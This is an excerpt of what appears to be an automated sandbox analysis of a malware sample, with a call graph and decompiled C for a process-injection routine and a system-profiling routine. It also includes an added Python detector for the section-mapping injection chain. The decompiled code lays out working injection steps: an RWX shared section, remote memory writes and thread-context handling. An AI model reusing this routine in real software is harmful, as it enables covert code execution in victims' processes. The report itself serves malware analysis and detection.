99e064 11372->11373 11464 99ca5a 11372->11464 11473 99f3a0 11373->11473 11378 99e099 11379 99e0e9 GetSystemMetrics 11378->11379 11380 99e0e3 GetLastError 11378->11380 11381 99e110 11379->11381 11380->11379 11482 99c85a 11381->11482 11387 99e14b 11499 99c870 11387->11499 11392 998f63 memset 11393 99e1a2 GetVersionExA 11392->11393 11394 99e1b3 11393->11394 11518 99dde7 11394->11518 11396 99e1c0 GetWindowsDirectoryW 11397 999f85 2 API calls 11396->11397 11398 99e1e3 11397->11398 11399 998d9a 2 API calls 11398->11399 11400 99e21d 11399->11400 11408->11340 11615 99d7cd 11409->11615 11413 99d9ca 11414 998ddf 2 API calls 11413->11414 11417 99d9d5 11414->11417 11415 99d9b8 11415->11413 11416 998ddf 2 API calls 11415->11416 11416->11415 11417->11341 11418 998f63 memset 11424 99d8c6 11418->11424 11421 99d939 GetLastError 11645 99dadc ResumeThread 11421->11645 11423 99d963 FindCloseChangeNotification 11423->11424 11424->11413 11424->11415 11424->11418 11424->11421 11424->11423 11627 99be10 11424->11627 11632 99d9de 11424->11632 11715 99a79b 11425->11715 11428 9961f7 11428->11339 11429 99620f 11731 99601d 11429->11731 11435 996223 11438 996228 11435->11438 11439 996277 11435->11439 11436 996272 11766 9960d9 11436->11766 11441 996293 11438->11441 11444 99b6e3 7 API calls 11438->11444 11440 996270 11439->11440 11439->11441 11779 9a0ac8 11439->11779 11800 9960bf 11440->11800 11441->11339 11445 996248 11444->11445 11743 995c8c 11445->11743 12962 998dc9 RtlAllocateHeap 11449->12962 11451 99359e 11452 9935d5 11451->11452 12963 998dc9 RtlAllocateHeap 11451->12963 11452->11339 11454 9935af 11454->11452 11455 9998d0 2 API calls 11454->11455 11455->11452 11456->11368 11458 99ca21 11457->11458 11459 99ca25 11458->11459 11542 99c9f3 11458->11542 11459->11372 11462 99ca4a FindCloseChangeNotification 11463 99ca36 11462->11463 11463->11372 11555 99c92f GetCurrentThread 11464->11555 11467 99cb10 11467->11373 11468 99c986 6 API calls 11472 99ca8e FindCloseChangeNotification 11468->11472 11470 
99cb06 11471 998ddf 2 API calls 11470->11471 11471->11467 11472->11467 11472->11470 11475 99f3bf 11473->11475 11474 99e08e 11477 99f365 11474->11477 11475->11474 11559 999ab3 11475->11559 11478 99f37c 11477->11478 11479 99f39c 11478->11479 11480 999ab3 RtlAllocateHeap 11478->11480 11479->11378 11481 99f389 11480->11481 11481->11378 11564 99c778 11482->11564 11484 99c86e 11485 99c64d 11484->11485 11486 99c668 11485->11486 11487 999f6b 2 API calls 11486->11487 11488 99c672 11487->11488 11579 9a36d5 11488->11579 11490 99c6bd 11491 998d87 2 API calls 11490->11491 11492 99c6c9 11491->11492 11495 999bd5 11492->11495 11493 99c687 11493->11490 11494 9a36d5 2 API calls 11493->11494 11494->11493 11496 999bdc 11495->11496 11497 999be1 MultiByteToWideChar 11495->11497 11496->11387 11498 999bf5 11497->11498 11498->11387 11500 999f6b 2 API calls 11499->11500 11501 99c88b 11500->11501 11502 999f6b 2 API calls 11501->11502 11504 99c89a 11502->11504 11503 99c92a 11512 99cbd7 11503->11512 11504->11503 11505 9a36d5 2 API calls 11504->11505 11506 99c8eb 11504->11506 11505->11504 11507 9a36d5 2 API calls 11506->11507 11508 99c916 11506->11508 11507->11506 11509 998d87 2 API calls 11508->11509 11510 99c922 11509->11510 11511 998d87 2 API calls 11510->11511 11511->11503 11513 99cbef 11512->11513 11514 99c986 6 API calls 11513->11514 11516 99cbf3 11513->11516 11517 99cc07 11514->11517 11515 998ddf 2 API calls 11515->11516 11516->11392 11517->11515 11517->11516 11519 99ddf1 11518->11519 11520 99ddf6 GetSystemInfo 11518->11520 11519->11396 11520->11396 11545 99c986 GetTokenInformation 11542->11545 11546 99c9a8 GetLastError 11545->11546 11553 99c9c5 11545->11553 11547 99c9b3 11546->11547 11546->11553 11554 998dc9 RtlAllocateHeap 11547->11554 11549 99c9bb 11550 99c9c9 GetTokenInformation 11549->11550 11549->11553 11551 99c9de 11550->11551 11550->11553 11552 998ddf 2 API calls 11551->11552 11552->11553 11553->11462 11553->11463 11554->11549 11556 99c94c 11555->11556 11557 99c950 GetLastError 
11556->11557 11558 99c95d 11556->11558 11557->11558 11558->11467 11558->11468 11560 999abc 11559->11560 11562 999ace 11559->11562 11563 998dc9 RtlAllocateHeap 11560->11563 11562->11474 11563->11562 11565 998f63 memset 11564->11565 11566 99c79a lstrcpynW 11565->11566 11568 999f85 2 API calls 11566->11568 11569 99c7cf GetVolumeInformationW 11568->11569 11570 998d9a 2 API calls 11569->11570 11571 99c804 11570->11571 11572 999fe4 2 API calls 11571->11572 11573 99c825 lstrcatW 11572->11573 11577 99a5e9 11573->11577 11576 99c84b 11576->11484 11578 99a5f1 CharUpperBuffW 11577->11578 11578->11576 11580 9a36e5 11579->11580 11581 9a3718 lstrlenW 11580->11581 11582 9a3735 _ftol2_sse 11581->11582 11582->11493 11616 99d7e7 11615->11616 11646 998dc9 RtlAllocateHeap 11616->11646 11618 99d878 11618->11417 11623 99b6e3 11618->11623 11619 999f85 2 API calls 11621 99d81b 11619->11621 11620 998d9a 2 API calls 11620->11621 11621->11618 11621->11619 11621->11620 11622 999ab3 RtlAllocateHeap 11621->11622 11622->11621 11624 99b6fc 11623->11624 11647 99b632 11624->11647 11628 998f63 memset 11627->11628 11629 99be26 11628->11629 11630 998f63 memset 11629->11630 11631 99be33 CreateProcessW 11630->11631 11631->11424 11656 99d309 11632->11656 11639 998f63 memset 11640 99da24 GetThreadContext 11639->11640 11641 99da4e NtProtectVirtualMemory 11640->11641 11642 99dace 11640->11642 11641->11642 11643 99da90 NtWriteVirtualMemory 11641->11643 11703 99d47c 11642->11703 11643->11642 11644 99daad NtProtectVirtualMemory 11643->11644 11644->11642 11645->11424 11646->11621 11648 9a357b 2 API calls 11647->11648 11649 99b64a 11648->11649 11650 999f6b 2 API calls 11649->11650 11651 99b674 11650->11651 11652 999fa5 2 API calls 11651->11652 11653 99b6d2 11652->11653 11654 998d87 2 API calls 11653->11654 11655 99b6dd 11654->11655 11655->11424 11657 99d325 11656->11657 11658 99d337 11656->11658 11657->11658 11659 99d464 11657->11659 11660 999f85 2 API calls 11658->11660 11659->11642 11682 99d538 11659->11682 
11661 99d344 11660->11661 11662 999fe4 2 API calls 11661->11662 11663 99d37d 11662->11663 11664 999f85 2 API calls 11663->11664 11665 99d39c 11664->11665 11708 999c50 11665->11708 11668 998d9a 2 API calls 11669 99d3c4 11668->11669 11670 999c50 2 API calls 11669->11670 11671 99d3e7 LoadLibraryW 11670->11671 11673 99d420 11671->11673 11674 99d412 11671->11674 11676 998ddf 2 API calls 11673->11676 11675 99f08e 3 API calls 11674->11675 11675->11673 11677 99d435 11676->11677 11678 998f63 memset 11677->11678 11679 99d447 11678->11679 11679->11659 11680 998ddf 2 API calls 11679->11680 11681 99d462 11680->11681 11681->11659 11683 99d56b 11682->11683 11684 99d58c NtCreateSection 11683->11684 11685 99d77f 11683->11685 11684->11685 11686 99d5b5 RegisterClassExA 11684->11686 11689 99d7b4 11685->11689 11695 99d7b0 NtUnmapViewOfSection 11685->11695 11687 99d609 CreateWindowExA 11686->11687 11688 99d645 NtMapViewOfSection 11686->11688 11687->11688 11690 99d633 DestroyWindow UnregisterClassA 11687->11690 11688->11685 11694 99d678 NtMapViewOfSection 11688->11694 11692 99d7c8 11689->11692 11693 99d7bd NtClose 11689->11693 11690->11688 11692->11639 11692->11642 11693->11692 11694->11685 11696 99d69c 11694->11696 11695->11689 11697 998e2e RtlAllocateHeap 11696->11697 11698 99d6ac 11697->11698 11698->11685 11699 99d6bb VirtualAllocEx WriteProcessMemory 11698->11699 11700 998ddf 2 API calls 11699->11700 11701 99d702 11700->11701 11702 99d765 lstrlenW 11701->11702 11702->11685 11704 99d493 11703->11704 11705 99d485 FreeLibrary 11703->11705 11706 99d4b4 11704->11706 11707 998ddf 2 API calls 11704->11707 11705->11704 11706->11424 11707->11706 11712 999c62 11708->11712 11710 999c81 11711 999c9e 11710->11711 11713 999c8d lstrcatW 11710->11713 11711->11668 11714 998dc9 RtlAllocateHeap 11712->11714 11713->11710 11714->11710 11804 99a7c6 11715->11804 11718 9a0cd9 11868 998dc9 RtlAllocateHeap 11718->11868 11720 9a0cea 11720->11429 11721 9a0ce0 11721->11720 11869 99b553 11721->11869 11724 9a0d2e 
11724->11429 11729 9a0ac8 14 API calls 11730 9a0d2b 11729->11730 11730->11429 11906 99ab83 11731->11906 11734 996319 11735 99b6e3 7 API calls 11734->11735 11736 996336 11735->11736 11737 995c8c 10 API calls 11736->11737 11739 996219 11736->11739 11738 996370 11737->11738 11738->11739 11937 99ab69 11738->11937 11739->11435 11739->11436 11742 996382 lstrcmpiW 11742->11739 11744 99b6e3 7 API calls 11743->11744 11745 995ca5 11744->11745 11746 995cb2 11745->11746 11747 999bfd 2 API calls 11745->11747 11748 995cd5 11747->11748 11941 99b270 11748->11941 11750 995ce5 11751 995d09 11750->11751 11754 99b270 2 API calls 11750->11754 11752 998ddf 2 API calls 11751->11752 11753 995d15 11752->11753 11755 99618c 11753->11755 11754->11751 11756 99ab69 4 API calls 11755->11756 11757 996196 11756->11757 11758 9961a4 lstrcmpiW 11757->11758 11761 99619f 11757->11761 11759 9961ba 11758->11759 11760 9961d6 11758->11760 11946 99ac61 11759->11946 11763 998ddf 2 API calls 11760->11763 11761->11440 11763->11761 11995 998dc9 RtlAllocateHeap 11766->11995 11768 9960eb 11769 99612f 11768->11769 11770 9960fe GetDriveTypeW 11768->11770 11996 992bee 11769->11996 11770->11769 11772 99614b 11773 996169 11772->11773 12015 995315 11772->12015 12068 99b162 11773->12068 11777 99b162 2 API calls 11778 996185 11777->11778 11778->11439 11780 99109a 2 API calls 11779->11780 11781 9a0ad7 11780->11781 12606 9967db memset 11781->12606 11784 998d9a 2 API calls 11785 9a0afd 11784->11785 11799 9a0b76 11785->11799 12618 99aaff 11785->12618 11789 9a0b28 11790 99109a 2 API calls 11789->11790 11789->11799 11791 9a0b3a 11790->11791 11792 999fe4 2 API calls 11791->11792 11793 9a0b49 11792->11793 11794 99b787 2 API calls 11793->11794 11795 9a0b5c 11794->11795 11796 9a0b6a 11795->11796 12622 99af67 11795->12622 11798 998ddf 2 API calls 11796->11798 11798->11799 11799->11440 11801 9960d1 11800->11801 12635 9959f4 11801->12635 11843 998dc9 RtlAllocateHeap 11804->11843 11806 99a7f0 11807 9961f3 11806->11807 11844 99c5c6 
11806->11844 11807->11428 11807->11429 11807->11718 11810 999f6b 2 API calls 11811 99a830 11810->11811 11812 99a96e 11811->11812 11816 99a85c 11811->11816 11813 99a9bf 11812->11813 11814 99a980 11812->11814 11815 999bfd 2 API calls 11813->11815 11818 999bfd 2 API calls 11814->11818 11838 99a96a 11814->11838 11815->11838 11816->11838 11854 999bfd 11816->11854 11817 998d87 2 API calls 11821 99a9df 11817->11821 11818->11838 11820 998ddf 2 API calls 11822 99aa75 11820->11822 11821->11820 11834 99aa3a 11821->11834 11825 998f63 memset 11822->11825 11824 99a924 11828 999bfd 2 API calls 11824->11828 11825->11834 11826 999f85 2 API calls 11827 99a8c2 11826->11827 11829 999c50 2 API calls 11827->11829 11832 99a94b 11828->11832 11831 99a8d4 11829->11831 11830 998ddf 2 API calls 11830->11807 11833 998d9a 2 API calls 11831->11833 11837 998ddf 2 API calls 11832->11837 11835 99a8e2 11833->11835 11834->11830 11834->11834 11860 999b26 11835->11860 11837->11838 11838->11817 11840 998ddf 2 API calls 11841 99a919 11840->11841 11842 998ddf 2 API calls 11841->11842 11842->11824 11843->11806 11845 99c5df 11844->11845 11846 9a36d5 2 API calls 11845->11846 11847 99c5ef 11846->11847 11848 999f6b 2 API calls 11847->11848 11850 99c5fe 11848->11850 11849 99c63a 11851 998d87 2 API calls 11849->11851 11850->11849 11852 9a36d5 2 API calls 11850->11852 11853 99a811 11851->11853 11852->11850 11853->11810 11855 999c0f 11854->11855 11866 998dc9 RtlAllocateHeap 11855->11866 11857 999c2c 11858 999c49 11857->11858 11859 999c38 lstrcatA 11857->11859 11858->11821 11858->11824 11858->11826 11859->11857 11861 999b5c 11860->11861 11862 999b2f 11860->11862 11861->11840 11867 998dc9 RtlAllocateHeap 11862->11867 11864 999b41 11864->11861 11865 999b49 MultiByteToWideChar 11864->11865 11865->11861 11866->11857 11867->11864 11868->11721 11870 99b56b 11869->11870 11874 99b564 11869->11874 11872 99b595 11870->11872 11870->11874 11900 998dc9 RtlAllocateHeap 11870->11900 11873 998ddf 2 API calls 11872->11873 
Control-flow graph: rendered call graph of the sample's functions (node addresses in the 0x991xxx to 0x9a3xxx range) annotated with the API each node calls: RtlAllocateHeap, HeapFree, memset, lstrlenW, lstrcatA/lstrcatW, GetLastError, GetModuleHandleA, CreateMutexW, GetSystemTimeAsFileTime, SetThreadPriority, GetCurrentThread, DuplicateHandle, CoInitializeEx, SetFileAttributesW, GetExitCodeProcess, ExitProcess. The edge list of the graph does not survive text export.

            Control-flow Graph

            C-Code - Quality: 95%
            			E0099D538(void* __ecx, intOrPtr __edx) {
            				void* _v8;
            				void* _v12;
            				void* _v16;
            				void* _v20;
            				long _v24;
            				long _v28;
            				short _v32;
            				char _v36;
            				intOrPtr* _v40;
            				intOrPtr _v44;
            				long _v48;
            				void* _v52;
            				void* _v53;
            				char _v64;
            				short _v68;
            				struct _WNDCLASSEXA _v116;
            				char _t81;
            				intOrPtr* _t83;
            				intOrPtr _t87;
            				intOrPtr _t90;
            				char _t97;
            				short _t98;
            				intOrPtr _t105;
            				long _t107;
            				char _t119;
            				void* _t124;
            				struct HWND__* _t132;
            				void* _t138;
            				void* _t147;
            				void* _t154;
            				intOrPtr _t155;
            				intOrPtr _t157;
            				void* _t158;
            				void* _t163;
            				void* _t165;
            
            				_t81 =  *0x9af8d4; // 0x452fc00
            				_t138 = 0;
            				_v12 = __ecx;
            				_t157 = __edx;
            				_v20 = 0;
            				_v52 = 0;
            				_v48 = 0;
            				_v16 = 0;
            				_v8 = 0;
            				_v24 = 0;
            				_v44 = __edx;
            				if(( *(_t81 + 0x1898) & 0x00000040) != 0) {
            					E0099F15B(0x1f4);
            				}
            				_t12 = _t157 + 0x3c; // 0x852c50ff
            				_t83 =  *_t12 + _t157;
            				_v28 = _t138;
            				_v40 = _t83;
            				if( *_t83 != 0x4550) {
            					L14:
            					_t158 = _v12;
            					L15:
            					if(_v8 != _t138) {
            						_t90 =  *0x9af9d0; // 0x452fa00
            						 *((intOrPtr*)(_t90 + 0x10))(_t158, _v8);
            						_v8 = _t138;
            					}
            					L17:
            					if(_v16 != 0) {
            						_t87 =  *0x9af8d0; // 0x452f8c0
            						NtUnmapViewOfSection( *((intOrPtr*)(_t87 + 0x12c))(), _v16);
            					}
            					if(_v20 != 0) {
            						NtClose(_v20);
            					}
            					return _v8;
            				}
            				_v52 =  *((intOrPtr*)(_t83 + 0x50));
            				if(NtCreateSection( &_v20, 0xe, _t138,  &_v52, 0x40, 0x8000000, _t138) < 0) {
            					goto L14;
            				}
            				_t97 =  *"18293"; // 0x39323831
            				_v36 = _t97;
            				_t98 =  *0x9ace70; // 0x33
            				_v32 = _t98;
            				_v116.lpszClassName =  &_v64;
            				asm("movsd");
            				_v116.lpfnWndProc = DefWindowProcW;
            				_v116.cbWndExtra = _t138;
            				asm("movsd");
            				_v116.style = 0xb;
            				_v116.lpszMenuName = _t138;
            				_v116.cbSize = 0x30;
            				asm("movsb");
            				_v116.cbClsExtra = _t138;
            				_v116.hInstance = _t138;
            				if(RegisterClassExA( &_v116) != 0) {
            					_t132 = CreateWindowExA(_t138,  &_v64,  &_v36, 0xcf0000, 0x80000000, 0x80000000, 0x1f4, 0x64, _t138, _t138, _t138, _t138);
            					if(_t132 != 0) {
            						DestroyWindow(_t132);
            						UnregisterClassA( &_v64, _t138);
            					}
            				}
            				_t105 =  *0x9af8d0; // 0x452f8c0
            				_t107 = NtMapViewOfSection(_v20,  *((intOrPtr*)(_t105 + 0x12c))(),  &_v16, _t138, _t138, _t138,  &_v24, 2, _t138, 0x40);
            				_t158 = _v12;
            				if(_t107 < 0 || NtMapViewOfSection(_v20, _t158,  &_v8, _t138, _t138, _t138,  &_v24, 2, _t138, 0x40) < 0) {
            					goto L15;
            				} else {
            					_t154 = E00998E2E( *0x9af8d4, 0x1ac4);
            					_v36 = _t154;
            					if(_t154 == 0) {
            						goto L15;
            					}
            					 *((intOrPtr*)(_t154 + 0x224)) = _v8;
            					_t163 = VirtualAllocEx(_t158, _t138, 0x1ac4, 0x1000, 4);
            					WriteProcessMemory(_v12, _t163, _t154, 0x1ac4,  &_v28);
            					E00998DDF( &_v36, 0x1ac4);
            					_t119 =  *0x9af8d4; // 0x452fc00
            					_t155 =  *0x9af8e8; // 0x990000
            					_v36 = _t119;
            					 *0x9af8e8 = _v8;
            					 *0x9af8d4 = _t163;
            					E00998EA6(_v16, _v44,  *((intOrPtr*)(_v40 + 0x50)));
            					E0099D4B7(_v16, _v8, _v44);
            					_t124 = E0099A5D0("Jjischug");
            					_v53 = _t138;
            					_t147 = 0xf;
            					if(_t124 > _t147) {
            						do {
            							L12:
            							_t63 = _t138 + 0x41; // 0x41
            							 *((char*)(_t165 + _t138 - 0x40)) = _t63;
            							_t138 = _t138 + 1;
            						} while (_t138 < _t147);
            						L13:
            						lstrlenW( &_v68);
            						 *0x9af8e8 = _t155;
            						 *0x9af8d4 = _v36;
            						goto L17;
            					}
            					_t147 = _t124;
            					if(_t147 == 0) {
            						goto L13;
            					}
            					goto L12;
            				}
            			}
Instruction addresses for the listing above: 0x0099d53e to 0x0099d7cc (the per-line address gutter does not align in text export).

            APIs
            • NtCreateSection.NTDLL(0099DA07,0000000E,00000000,?,00000040,08000000,00000000,?), ref: 0099D5AA
            • RegisterClassExA.USER32(?), ref: 0099D5FE
            • CreateWindowExA.USER32 ref: 0099D629
            • DestroyWindow.USER32(00000000), ref: 0099D634
            • UnregisterClassA.USER32 ref: 0099D63F
            • NtMapViewOfSection.NTDLL(0099DA07,00000000), ref: 0099D66A
            • NtMapViewOfSection.NTDLL(0099DA07,00000000,00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 0099D691
            • VirtualAllocEx.KERNELBASE(00000000,00000000,00001AC4,00001000,00000004), ref: 0099D6D7
            • WriteProcessMemory.KERNELBASE(00000000,00000000,00000000,00001AC4,?), ref: 0099D6F1
              • Part of subcall function 00998DDF: HeapFree.KERNEL32(00000000,00000000), ref: 00998E25
            • lstrlenW.KERNEL32(?,?,?,?,?,?,00000000,00996297), ref: 0099D769
            • NtUnmapViewOfSection.NTDLL(00000000), ref: 0099D7B1
            • NtClose.NTDLL(00000000), ref: 0099D7C5
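The API list above is the signature of the injection technique the decompiled function uses: an RWX section (DesiredAccess 0xe, SectionPageProtection 0x40, SEC_COMMIT 0x8000000) is mapped once into the loader with the GetCurrentProcess pseudo-handle and once into the target process, the image is copied into the local view, and a 0x1ac4-byte context block is then placed in the target with VirtualAllocEx and WriteProcessMemory; the window class that is registered, created, destroyed and unregistered in between never pumps a message. The following detector is an added example, not Joe Sandbox code and not the sample's own code: it walks a trace of API calls, decodes the NtCreateSection arguments at the positions shown in the listing, and reports the double-mapping and the remote write. The trace, the handle values (0x2a8, 0x1f0) and the section size are constructed for the example.

```python
"""Flag the section-mapping injection chain in an API trace.

Added example, not Joe Sandbox code and not the sample's code. Argument
positions follow the NtCreateSection / NtMapViewOfSection calls in the
decompiled function; the trace and every handle value in it are constructed.
"""
from dataclasses import dataclass
from typing import Iterable, Optional

# Access bits and attributes seen in NtCreateSection(&h, 0xe, NULL, &size, 0x40, 0x8000000, NULL)
SECTION_MAP_WRITE = 0x2
SECTION_MAP_READ = 0x4
SECTION_MAP_EXECUTE = 0x8
SECTION_MAP_RWX = SECTION_MAP_READ | SECTION_MAP_WRITE | SECTION_MAP_EXECUTE  # 0xe
PAGE_EXECUTE_READWRITE = 0x40
SEC_COMMIT = 0x08000000
CURRENT_PROCESS = 0xFFFFFFFF  # GetCurrentProcess() pseudo-handle as a 32-bit value


@dataclass(frozen=True)
class ApiCall:
    name: str
    args: tuple
    ret: int = 0


def decode_nt_create_section(call: ApiCall) -> dict:
    """Decode DesiredAccess (arg 1), SectionPageProtection (arg 4), AllocationAttributes (arg 5)."""
    access, protect, attrs = call.args[1], call.args[4], call.args[5]
    return {
        "rwx_access": (access & SECTION_MAP_RWX) == SECTION_MAP_RWX,
        "rwx_pages": protect == PAGE_EXECUTE_READWRITE,
        "committed": bool(attrs & SEC_COMMIT),
    }


def find_section_injection(trace: Iterable[ApiCall]) -> Optional[dict]:
    """Return a finding once an RWX section is mapped into both this process and a
    foreign one; upgrade it when the foreign process is written to afterwards."""
    rwx_sections: dict = {}   # section handle -> decoded flags
    local_views: set = set()  # sections mapped into our own process
    remote_views: dict = {}   # section handle -> foreign process handle
    finding = None
    for c in trace:
        if c.name == "NtCreateSection":
            flags = decode_nt_create_section(c)
            if flags["rwx_access"] and flags["rwx_pages"]:
                rwx_sections[c.ret] = flags
        elif c.name == "NtMapViewOfSection":
            section, process = c.args[0], c.args[1]
            if section not in rwx_sections:
                continue
            if process == CURRENT_PROCESS:
                local_views.add(section)
            else:
                remote_views[section] = process
            if section in local_views and section in remote_views:
                finding = {"stage": "shared_rwx_view", "section": section,
                           "target_process": remote_views[section], **rwx_sections[section]}
        elif c.name == "WriteProcessMemory" and finding and c.args[0] == finding["target_process"]:
            finding = {**finding, "stage": "remote_write", "written_bytes": c.args[3]}
    return finding


def find_decoy_window(trace: Iterable[ApiCall]) -> bool:
    """A window class registered, created, destroyed and unregistered back to back,
    with no message pump in between, is set-up noise rather than a real UI."""
    names = [c.name for c in trace]
    pattern = ["RegisterClassExA", "CreateWindowExA", "DestroyWindow", "UnregisterClassA"]
    return any(names[i:i + 4] == pattern for i in range(len(names) - 3))


# Constructed trace mirroring the call order of the decompiled function; the
# handle values and the 0x20000 section size are made up for the example.
TARGET = 0x2a8
SECTION = 0x1f0
SAMPLE_TRACE = [
    ApiCall("NtCreateSection", (0, 0xe, 0, 0x20000, 0x40, 0x8000000, 0), ret=SECTION),
    ApiCall("RegisterClassExA", (0,), ret=0xc01d),
    ApiCall("CreateWindowExA", (0,), ret=0x50312),
    ApiCall("DestroyWindow", (0x50312,), ret=1),
    ApiCall("UnregisterClassA", (0, 0), ret=1),
    ApiCall("NtMapViewOfSection", (SECTION, CURRENT_PROCESS, 0, 0, 0, 0, 0, 2, 0, 0x40)),
    ApiCall("NtMapViewOfSection", (SECTION, TARGET, 0, 0, 0, 0, 0, 2, 0, 0x40)),
    ApiCall("VirtualAllocEx", (TARGET, 0, 0x1ac4, 0x1000, 4), ret=0x400000),
    ApiCall("WriteProcessMemory", (TARGET, 0x400000, 0, 0x1ac4, 0), ret=1),
]

# Constructed benign trace: a read/write section mapped only into the caller.
BENIGN_TRACE = [
    ApiCall("NtCreateSection", (0, 0x6, 0, 0x1000, 0x04, 0x8000000, 0), ret=0x10),
    ApiCall("NtMapViewOfSection", (0x10, CURRENT_PROCESS, 0, 0, 0, 0, 0, 2, 0, 0x04)),
]

if __name__ == "__main__":
    print(find_section_injection(SAMPLE_TRACE))
    print("decoy window:", find_decoy_window(SAMPLE_TRACE))
```

The finding is keyed on the section handle rather than on the process handle because the same handle value recurs in both NtMapViewOfSection calls while the process argument differs; a detector that only looks for VirtualAllocEx followed by WriteProcessMemory would miss the variant where the loader stops after the double mapping and transfers control through the shared view alone.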
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.269120079.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_990000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: Section$View$ClassCreateWindow$AllocCloseDestroyFreeHeapMemoryProcessRegisterUnmapUnregisterVirtualWritelstrlen
            • String ID: 0$18293$Jjischug$aeroflot
            • API String ID: 494031690-3772587274
            • Opcode ID: 8107dfc178fe32ce91920b3658d792e857edc3456d9da6fa0936f7eff64be523
            • Instruction ID: 10ca021678b6ea6aefaf286b704ae999149804fc848d9c320a0714be5cb57935
            • Opcode Fuzzy Hash: 8107dfc178fe32ce91920b3658d792e857edc3456d9da6fa0936f7eff64be523
            • Instruction Fuzzy Hash: FC8115B5A11219AFDB10DFD8DC84AAEBBF8FF09744F14406AE505A7260D774AD00DBA0
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            C-Code - Quality: 79%
            			E0099DFC2(void* __fp0) {
            				char _v8;
            				char _v12;
            				char _v16;
            				char _v144;
            				char _v656;
            				char _v668;
            				char _v2644;
            				void* __esi;
            				struct _OSVERSIONINFOA* _t68;
            				intOrPtr _t70;
            				void* _t71;
            				intOrPtr _t73;
            				void* _t74;
            				intOrPtr _t75;
            				intOrPtr* _t77;
            				intOrPtr _t79;
            				intOrPtr _t80;
            				intOrPtr _t81;
            				intOrPtr _t87;
            				int _t90;
            				intOrPtr _t92;
            				void* _t93;
            				void* _t97;
            				intOrPtr _t99;
            				intOrPtr _t101;
            				short _t106;
            				char _t108;
            				intOrPtr _t113;
            				intOrPtr _t116;
            				intOrPtr _t119;
            				intOrPtr _t123;
            				intOrPtr _t134;
            				intOrPtr _t136;
            				intOrPtr _t138;
            				intOrPtr _t141;
            				intOrPtr _t143;
            				intOrPtr _t148;
            				void* _t149;
            				WCHAR* _t150;
            				char* _t151;
            				intOrPtr _t162;
            				intOrPtr _t177;
            				void* _t191;
            				struct _OSVERSIONINFOA* _t192;
            				void* _t193;
            				void* _t195;
            				char _t198;
            				void* _t199;
            				char* _t200;
            				void* _t203;
            				int* _t204;
            				void* _t216;
            
            				_t216 = __fp0;
            				_t148 =  *0x9af8e8; // 0x990000
            				_t68 = E00998DC9(0x1ac4);
            				_t192 = _t68;
            				if(_t192 != 0) {
            					 *((intOrPtr*)(_t192 + 0x1640)) = GetCurrentProcessId();
            					_t70 =  *0x9af8d0; // 0x452f8c0
            					_t71 =  *((intOrPtr*)(_t70 + 0xac))(_t193);
            					_t3 = _t192 + 0x648; // 0x648
            					E009A35A9( *((intOrPtr*)(_t192 + 0x1640)) + _t71, _t3);
            					_t73 =  *0x9af8d0; // 0x452f8c0
            					_t5 = _t192 + 0x1644; // 0x1644
            					_t194 = _t5;
            					_t74 =  *((intOrPtr*)(_t73 + 0x128))(0, _t5, 0x105);
            					_t207 = _t74;
            					if(_t74 != 0) {
            						 *((intOrPtr*)(_t192 + 0x1854)) = E009997E9(_t194, _t207);
            					}
            					_t75 =  *0x9af8d0; // 0x452f8c0
            					_t77 = E0099CA0A( *((intOrPtr*)(_t75 + 0x12c))()); // executed
            					 *((intOrPtr*)(_t192 + 0x110)) = _t77;
            					_t159 =  *_t77;
            					if(E0099CB85( *_t77) == 0) {
            						_t79 = E0099CA5A(_t159, _t194); // executed
            						__eflags = _t79;
            						_t162 = (0 | _t79 > 0x00000000) + 1;
            						__eflags = _t162;
            						 *((intOrPtr*)(_t192 + 0x214)) = _t162;
            					} else {
            						 *((intOrPtr*)(_t192 + 0x214)) = 3;
            					}
            					_t14 = _t192 + 0x220; // 0x220, executed
            					_t80 = E0099F3A0(_t14); // executed
            					 *((intOrPtr*)(_t192 + 0x218)) = _t80;
            					_t81 = E0099F365(_t14); // executed
            					 *((intOrPtr*)(_t192 + 0x21c)) = _t81;
            					_t17 = _t192 + 0x114; // 0x114
            					_t195 = _t17;
            					 *((intOrPtr*)(_t192 + 0x224)) = _t148;
            					_push( &_v16);
            					_v12 = 0x80;
            					_push( &_v8);
            					_v8 = 0x100;
            					_push( &_v656);
            					_push( &_v12);
            					_push(_t195);
            					_push( *((intOrPtr*)( *((intOrPtr*)(_t192 + 0x110)))));
            					_t87 =  *0x9af8d8; // 0x452fab0
            					_push(0); // executed
            					if( *((intOrPtr*)(_t87 + 0x6c))() == 0) {
            						GetLastError();
            					}
            					_t90 = GetSystemMetrics(0x1000);
            					_t28 = _t192 + 0x228; // 0x228
            					_t149 = _t28;
            					 *(_t192 + 0x1850) = 0 | _t90 > 0x00000000;
            					E0099DFBB(_t149); // executed
            					_t211 = _t149;
            					if(_t149 != 0) {
            						 *((intOrPtr*)(_t192 + 0x434)) = E009997E9(_t149, _t211);
            					}
            					_t92 = E0099C85A();
            					_t33 = _t192 + 0xb0; // 0xb0
            					_t196 = _t33;
            					 *((intOrPtr*)(_t192 + 0xac)) = _t92;
            					_t93 = E0099C64D(_t92, _t33, _t211, _t216);
            					_t35 = _t192 + 0xd0; // 0xd0
            					E00999BD5(_t93, _t33, _t35);
            					_t36 = _t192 + 0x438; // 0x438
            					E00999803(_t149, _t36);
            					_t97 = E0099E34A(_t196, E0099A5D0(_t33), 0);
            					_t37 = _t192 + 0x100c; // 0x100c
            					E0099C870(_t97, _t37, _t216);
            					_t99 =  *0x9af8d0; // 0x452f8c0
            					_t101 = E0099CBD7( *((intOrPtr*)(_t99 + 0x12c))(_t195)); // executed
            					 *((intOrPtr*)(_t192 + 0x101c)) = _t101;
            					E00998F63(_t192, 0, 0x9c);
            					_t204 = _t203 + 0xc;
            					_t192->dwOSVersionInfoSize = 0x9c;
            					GetVersionExA(_t192);
            					 *((intOrPtr*)(_t192 + 0xa8)) = E0099DDBE(_t100);
            					_t106 = E0099DDE7(_t105);
            					_t41 = _t192 + 0x1020; // 0x1020
            					_t150 = _t41;
            					 *((short*)(_t192 + 0x9c)) = _t106;
            					GetWindowsDirectoryW(_t150, 0x104);
            					_t108 = E00999F85(_t105, 0xf73);
            					_t177 =  *0x9af8d0; // 0x452f8c0
            					_t198 = _t108;
            					 *_t204 = 0x104;
            					_push( &_v668);
            					_push(_t198);
            					_v8 = _t198;
